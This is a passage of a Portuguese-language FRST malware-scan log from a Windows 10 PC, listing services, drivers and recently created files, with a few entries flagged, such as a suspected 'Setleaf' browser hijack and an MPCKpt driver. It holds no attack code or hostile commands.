HKU\S-1-5-21-1966662122-1671974175-2396957999-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Setleaf\Application\chrome.exe <==== ATENÃÃO

==================== ServiÃ§os (Whitelisted) ====================

(Se uma entrada for incluÃ­da na fixlist, serÃ¡ removida do Registro. O arquivo nÃ£o serÃ¡ movido, a menos que seja colocado separadamente.)

S4 AdobeUpdateService; C:\Program Files\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-12] (Adobe Systems Incorporated)
S4 AGSService; C:\Program Files\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S4 BrYNSvc; C:\Program Files\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [Arquivo nÃ£o assinado]
S4 cphs; C:\WINDOWS\system32\IntelCpHeciSvc.exe [300120 2017-03-10] (Intel Corporation)
S4 Droid4XService; C:\Program Files\Droid4X\Droid4XService.exe [279552 2016-06-13] () [Arquivo nÃ£o assinado]
S4 EMP_UDSA; C:\Program Files\EPSON Projector\Epson USB Display V1.6\EMP_UDSA.exe [157696 2011-11-17] (SEIKO EPSON CORPORATION) [Arquivo nÃ£o assinado]
S4 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [7168 2012-07-09] (Intel Corporation) [Arquivo nÃ£o assinado]
S4 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [462048 2012-04-20] (Intel(R) Corporation)
S4 Intel(R) ME Service; C:\Program Files\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
S4 jhi_service; C:\Program Files\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2545848 2017-03-19] (Microsoft Corporation)
S4 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [218784 2015-08-21] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [265352 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [82488 2017-06-20] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(Se uma entrada for incluÃ­da na fixlist, serÃ¡ removida do Registro. O arquivo nÃ£o serÃ¡ movido, a menos que seja colocado separadamente.)

R0 09452932; C:\WINDOWS\system32\DRIVERS\09452932.sys [133208 2013-11-27] (Kaspersky Lab ZAO)
R3 athr; C:\WINDOWS\System32\drivers\athw8.sys [3228672 2017-03-18] (Qualcomm Atheros Communications, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [109184 2016-09-05] (Samsung Electronics Co., Ltd.)
R1 EMP_MIRRUD; C:\WINDOWS\system32\DRIVERS\EMP_MirrUD.sys [3712 2011-11-17] (Windows (R) Codename Longhorn DDK provider)
R3 eppvad_simple; C:\WINDOWS\system32\drivers\EMP_UDAU.sys [17664 2011-11-17] (SEIKO EPSON CORPORATION)
R0 iaStorA; C:\WINDOWS\System32\drivers\iaStorA.sys [503048 2015-05-29] (Intel Corporation)
R3 int0800; C:\WINDOWS\System32\drivers\flashud.sys [42496 2009-09-09] (Intel Corporation)
R3 MEI; C:\WINDOWS\System32\drivers\TeeDriverW8.sys [162560 2015-08-31] (Intel Corporation)
R1 MPCKpt; C:\WINDOWS\System32\DRIVERS\MPCKpt.sys [52968 2016-02-08] (DotC United Inc) <==== ATENÃÃO
R1 MpKsl65403b11; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{2796526E-04E7-4B97-9CD5-B0B0691A750D}\MpKsl65403b11.sys [40776 2017-10-29] (Microsoft Corporation)
S3 NETJME; C:\WINDOWS\System32\drivers\NETJME.sys [119296 2017-03-18] (JMicron Technology Corp.)
S3 RTL8192Ce; C:\WINDOWS\System32\drivers\rtl8192Ce.sys [943720 2010-11-02] (Realtek Semiconductor Corporation )
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [37024 2015-08-21] (Synaptics Incorporated)
R2 SoilIO; C:\WINDOWS\system32\Drivers\SoilIO.sys [16248 2009-12-04] ()
R3 soilkbc; C:\WINDOWS\system32\Drivers\soilkbc.sys [10744 2009-12-04] (Systems Internals)
R3 SoilMC; C:\WINDOWS\system32\Drivers\SoilMC.sys [10616 2009-12-04] (Systems Internals)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [147072 2016-09-05] (Samsung Electronics Co., Ltd.)
R1 vivadrv; C:\WINDOWS\System32\drivers\vivadrv.sys [49920 2015-09-17] (Windows (R) Win 7 DDK provider)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [37464 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [243104 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [96672 2017-03-18] (Microsoft Corporation)
S3 WUDFWpdMtp; C:\WINDOWS\System32\drivers\WUDFRd.sys [160256 2017-03-18] (Microsoft Corporation)
S1 bswxidqd; \??\C:\WINDOWS\system32\drivers\bswxidqd.sys [X]
U3 idsvc; nÃ£o ImagePath

==================== NetSvcs (Whitelisted) ===================

(Se uma entrada for incluÃ­da na fixlist, serÃ¡ removida do Registro. O arquivo nÃ£o serÃ¡ movido, a menos que seja colocado separadamente.)


==================== Um MÃªs Criados arquivos e pastas ========

(Se uma entrada for incluÃ­da na fixlist, o arquivo/pasta serÃ¡ movido.)

2017-10-30 12:01 - 2017-10-30 12:01 - 018984960 _____ C:\Users\Filipe\Downloads\Anal team-fucked hawt slut - XVIDEOSCOM.mp4.crdownload
2017-10-30 11:59 - 2017-10-30 12:04 - 000030728 _____ C:\Users\Filipe\Desktop\FRST.txt
2017-10-30 11:59 - 2017-10-30 11:59 - 000000000 ____D C:\FRST
2017-10-30 11:56 - 2017-10-30 11:57 - 001799680 _____ (Farbar) C:\Users\Filipe\Desktop\FRST.exe
2017-10-28 12:40 - 2017-10-28 12:58 - 005660403 _____ (Swearware) C:\Users\Filipe\Desktop\ComboFix.exe
2017-10-27 16:16 - 2017-10-27 16:16 - 000077824 ____N C:\WINDOWS\KMSEmulator.exe
2017-10-26 09:01 - 2017-10-26 09:01 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsignc0c0442d8783cdd0
2017-10-26 09:00 - 2017-10-26 09:00 - 000629919 _____ C:\Users\Filipe\Desktop\cd eva.psd
2017-10-26 09:00 - 2017-10-26 09:00 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsignef8d4a4e4d797017
2017-10-26 08:58 - 2017-10-26 08:58 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsignd8eabf8cc507e401
2017-10-26 08:58 - 2017-10-26 08:58 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsigna2f51a8c04ab8c64
2017-10-25 19:11 - 2017-10-25 19:11 - 000584356 _____ C:\Users\Filipe\Documents\princesas.cdr
2017-10-25 14:04 - 2017-10-25 16:27 - 002817899 _____ C:\Users\Filipe\Desktop\MATEMÃTICA ODUVALDO.pptx
2017-10-25 13:31 - 2017-10-25 13:31 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign22f415c2a4fa67de
2017-10-25 13:30 - 2017-10-25 13:30 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsigne29141eba088573e
2017-10-25 13:30 - 2017-10-25 13:30 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign9a02cfd836c92508
2017-10-25 13:27 - 2017-10-25 13:27 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsignf67d44957982eff9
2017-10-25 13:27 - 2017-10-25 13:27 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign74084c153d4dd756
2017-10-25 13:25 - 2017-10-25 13:25 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign4be5b9d456fec417
2017-10-25 13:25 - 2017-10-25 13:25 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign2c06503144327d06
2017-10-25 12:02 - 2017-10-25 12:02 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign6f161aad93221963
2017-10-25 12:00 - 2017-10-25 12:00 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsignd54327dd72ed7bd9
2017-10-25 11:59 - 2017-10-25 11:59 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsignd8d8406b95b5bbed
2017-10-25 11:59 - 2017-10-25 11:59 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsignca11e87dd1e88c38
2017-10-25 11:59 - 2017-10-25 11:59 - 000000000 ____D C:\Users\Filipe\AppData\Local\Tempzxpsign7cbb333f0e1c05e4
2017-10-18 13:46 - 2017-10-18 13:46 - 124059592 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT-KB890830.exe
2017-10-18 13:21 - 2017-09-30 00:04 - 004215184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2017-10-18 13:21 - 2017-09-30 00:04 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-10-18 13:21 - 2017-09-30 00:04 - 000259856 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-10-18 13:21 - 2017-09-29 05:38 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-10-18 13:20 - 2017-09-30 00:29 - 000804784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-10-18 13:20 - 2017-09-30 00:05 - 000750488 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-10-18 13:20 - 2017-09-30 00:03 - 006768288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-10-18 13:20 - 2017-09-29 05:45 - 002953216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-10-18 13:20 - 2017-09-29 05:41 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-10-18 13:20 - 2017-09-29 05:39 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdbusenum.dll
2017-10-18 13:20 - 2017-09-29 05:38 - 000463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll
2017-10-18 13:20 - 2017-09-29 05:38 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2017-10-18 13:20 - 2017-09-29 05:37 - 000306688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.dll
2017-10-18 13:20 - 2017-09-29 05:34 - 001089536 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-10-18 13:20 - 2017-09-29 05:34 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-10-18 13:20 - 2017-09-29 05:33 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-10-18 13:20 - 2017-09-29 05:33 - 002123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-10-18 13:20 - 2017-09-29 05:33 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-10-18 13:20 - 2017-09-29 05:32 - 000316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-10-18 13:20 - 2017-09-29 05:29 - 001460736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2017-10-18 13:20 - 2017-09-29 05:29 - 001318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2017-10-18 13:19 - 2017-09-30 00:26 - 001333136 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-10-18 13:19 - 2017-09-30 00:26 - 001241240 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2017-10-18 13:19 - 2017-09-30 00:10 - 001150776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-10-18 13:19 - 2017-09-30 00:05 - 001266544 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-10-18 13:19 - 2017-09-30 00:05 - 000559000 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-10-18 13:19 - 2017-09-30 00:04 - 000347544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-10-18 13:19 - 2017-09-30 00:04 - 000249016 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-10-18 13:19 - 2017-09-30 00:04 - 000186776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-10-18 13:19 - 2017-09-30 00:03 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-10-18 13:19 - 2017-09-30 00:02 - 000175512 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll
2017-10-18 13:19 - 2017-09-30 00:01 - 002077592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-10-18 13:19 - 2017-09-29 05:43 - 000142336 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-10-18 13:19 - 2017-09-29 05:43 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\usoapi.dll
2017-10-18 13:19 - 2017-09-29 05:42 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-10-18 13:19 - 2017-09-29 05:42 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-10-18 13:19 - 2017-09-29 05:42 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\mgmtapi.dll
2017-10-18 13:19 - 2017-09-29 05:41 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-10-18 13:19 - 2017-09-29 05:41 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2017-10-18 13:19 - 2017-09-29 05:40 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-10-18 13:19 - 2017-09-29 05:40 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-10-18 13:19 - 2017-09-29 05:39 - 000558592 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-10-18 13:19 - 2017-09-29 05:38 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-10-18 13:19 - 2017-09-29 05:38 - 000308224 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptngc.dll
2017-10-18 13:19 - 2017-09-29 05:38 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-10-18 13:19 - 2017-09-29 05:37 - 000351744 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-10-18 13:19 - 2017-09-29 05:37 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-10-18 13:19 - 2017-09-29 05:36 - 002957824 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-10-18 13:19 - 2017-09-29 05:35 - 001832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-10-18 13:19 - 2017-09-29 05:34 - 001918464 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-10-18 13:19 - 2017-09-29 05:34 - 001339904 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2017-10-18 13:19 - 2017-09-29 05:34 - 000798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-10-18 13:19 - 2017-09-29 05:34 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-10-18 13:19 - 2017-09-29 05:34 - 000434176 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2017-10-18 13:19 - 2017-09-29 05:33 - 007598080 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-10-18 13:19 - 2017-09-29 05:32 - 001244160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2017-10-18 13:19 - 2017-09-29 05:31 - 003107328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2017-10-18 13:19 - 2017-09-29 05:31 - 000625664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-10-18 13:19 - 2017-09-29 05:31 - 000134656 _____ (Microsoft Corporation) C:\WINDOWS\system32\TabSvc.dll
2017-10-18 13:19 - 2017-09-29 05:30 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-10-18 13:19 - 2017-09-29 05:30 - 000228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-10-18 13:19 - 2017-09-29 05:29 - 000161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2017-10-18 13:19 - 2017-09-29 05:28 - 001926656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-10-18 13:18 - 2017-09-30 00:07 - 000815608 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2017-10-18 13:18 - 2017-09-29 05:39 - 000330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2017-10-18 13:18 - 2017-09-29 05:38 - 000359424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-10-18 13:18 - 2017-09-29 05:37 - 000309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2017-10-18 13:18 - 2017-09-29 05:35 - 003654656 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-10-18 13:18 - 2017-09-29 05:35 - 001993216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-10-18 13:18 - 2017-09-29 05:34 - 006255616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-10-18 13:18 - 2017-09-29 05:34 - 000665088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-10-18 13:18 - 2017-09-29 05:33 - 000658944 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-10-18 13:18 - 2017-09-29 05:33 - 000471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-10-18 13:18 - 2017-09-29 05:31 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\system32\regsvc.dll
2017-10-18 13:18 - 2017-09-29 05:29 - 000767488 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2017-10-18 13:18 - 2017-09-29 05:29 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2017-10-18 13:18 - 2017-09-29 05:29 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2017-10-18 13:18 - 2017-09-29 05:29 - 000282624 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2017-10-18 13:18 - 2017-09-29 05:29 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll
2017-10-18 13:18 - 2017-09-29 05:28 - 001244672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-10-18 13:18 - 2017-09-29 05:28 - 000351744 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdechangepin.exe
2017-10-18 13:18 - 2017-09-29 05:28 - 000190976 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe
2017-10-18 13:18 - 2017-09-29 05:28 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2017-10-18 13:18 - 2017-09-29 05:28 - 000104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Robocopy.exe
2017-10-18 13:17 - 2017-09-30 00:10 - 005862296 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-10-18 13:17 - 2017-09-30 00:10 - 001971232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-10-18 13:17 - 2017-09-30 00:10 - 000606072 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-10-18 13:17 - 2017-09-30 00:05 - 002603744 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-10-18 13:17 - 2017-09-30 00:03 - 001439032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2017-10-18 13:17 - 2017-09-29 05:40 - 000432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2017-10-18 13:17 - 2017-09-29 05:40 - 000391680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2017-10-18 13:17 - 2017-09-29 05:38 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-10-18 13:17 - 2017-09-29 05:36 - 000590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-10-18 13:17 - 2017-09-29 05:32 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-10-18 13:17 - 2017-09-29 05:28 - 000297984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcbuilder.exe
2017-10-18 13:17 - 2017-09-20 13:08 - 000640512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mswstr10.dll
2017-10-18 13:17 - 2017-09-20 13:08 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjint40.dll
2017-10-18 13:16 - 2017-09-30 00:29 - 001427656 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-10-18 13:16 - 2017-09-30 00:10 - 001855336 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-10-18 13:16 - 2017-09-30 00:10 - 000103320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys
2017-10-18 13:16 - 2017-09-30 00:07 - 000144176 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspicli.dll
2017-10-18 13:16 - 2017-09-30 00:06 - 002022808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-10-18 13:16 - 2017-09-30 00:06 - 000582552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-10-18 13:16 - 2017-09-30 00:05 - 005827744 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-10-18 13:16 - 2017-09-30 00:01 - 000044008 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-10-18 13:16 - 2017-09-29 05:44 - 000133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2017-10-18 13:16 - 2017-09-29 05:42 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2017-10-18 13:16 - 2017-09-29 05:40 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ServiceWorkerHost.exe
2017-10-18 13:16 - 2017-09-29 05:39 - 020511232 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-10-18 13:16 - 2017-09-29 05:39 - 011888640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-10-18 13:16 - 2017-09-29 05:39 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-10-18 13:16 - 2017-09-29 05:38 - 001135616 ____R (The ICU Project) C:\WINDOWS\system32\icuuc.dll
2017-10-18 13:16 - 2017-09-29 05:36 - 019337216 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-10-18 13:16 - 2017-09-29 05:34 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-10-18 13:16 - 2017-09-29 05:33 - 001137152 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-10-18 13:16 - 2017-09-29 05:32 - 001627136 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-10-18 13:16 - 2017-09-29 05:30 - 000116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsiexe.dll
2017-10-18 13:16 - 2017-09-29 05:28 - 000681472 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2017-10-18 13:16 - 2017-09-29 05:28 - 000473088 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2017-10-18 13:16 - 2017-09-29 03:40 - 000804312 _____ C:\WINDOWS\system32\locale.nls
2017-10-18 13:16 - 2017-09-20 13:08 - 000345088 _____ (Microsoft Corporation) C:\WINDOWS\system32\msexcl40.dll
2017-10-18 13:15 - 2017-09-30 00:10 - 000508344 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2017-10-18 13:15 - 2017-09-30 00:09 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-10-18 13:15 - 2017-09-30 00:05 - 000755608 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-10-18 13:15 - 2017-09-30 00:04 - 000612120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-10-18 13:15 - 2017-09-29 05:43 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-10-18 13:15 - 2017-09-29 05:41 - 013844992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-10-18 13:15 - 2017-09-29 05:41 - 000110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerCsp.dll
2017-10-18 13:15 - 2017-09-29 05:41 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\efssvc.dll
2017-10-18 13:15 - 2017-09-29 05:40 - 000213504 _____ (Microsoft Corporation) C:\WINDOWS\system32\dusmsvc.dll
2017-10-18 13:15 - 2017-09-29 05:38 - 000193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-10-18 13:15 - 2017-09-29 05:36 - 000905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-10-18 13:15 - 2017-09-29 05:34 - 000963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-10-18 13:15 - 2017-09-29 05:33 - 001560064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-10-18 13:15 - 2017-09-29 05:33 - 001506816 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-10-18 13:15 - 2017-09-29 05:32 - 002340864 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-10-18 13:15 - 2017-09-29 05:31 - 000242688 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2017-10-18 13:15 - 2017-09-29 05:28 - 000040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\cipher.exe
2017-10-18 13:14 - 2017-09-30 00:10 - 000480920 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2017-10-18 13:14 - 2017-09-30 00:04 - 001520536 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-10-18 13:14 - 2017-09-30 00:04 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-10-18 13:14 - 2017-09-30 00:04 - 000182680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-10-18 13:14 - 2017-09-30 00:04 - 000154520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2017-10-18 13:14 - 2017-09-30 00:02 - 001624096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.AppAgent.dll
2017-10-18 13:14 - 2017-09-30 00:02 - 001517464 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems32.dll
2017-10-18 13:14 - 2017-09-30 00:02 - 001293856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-10-18 13:14 - 2017-09-30 00:02 - 001158040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll
2017-10-18 13:14 - 2017-09-30 00:02 - 000960920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-10-18 13:14 - 2017-09-30 00:02 - 000649760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe
2017-10-18 13:14 - 2017-09-30 00:02 - 000635800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll
2017-10-18 13:14 - 2017-09-30 00:02 - 000498072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll
2017-10-18 13:14 - 2017-09-30 00:02 - 000496024 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVCatalog.dll
2017-10-18 13:14 - 2017-09-29 05:40 - 000371200 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
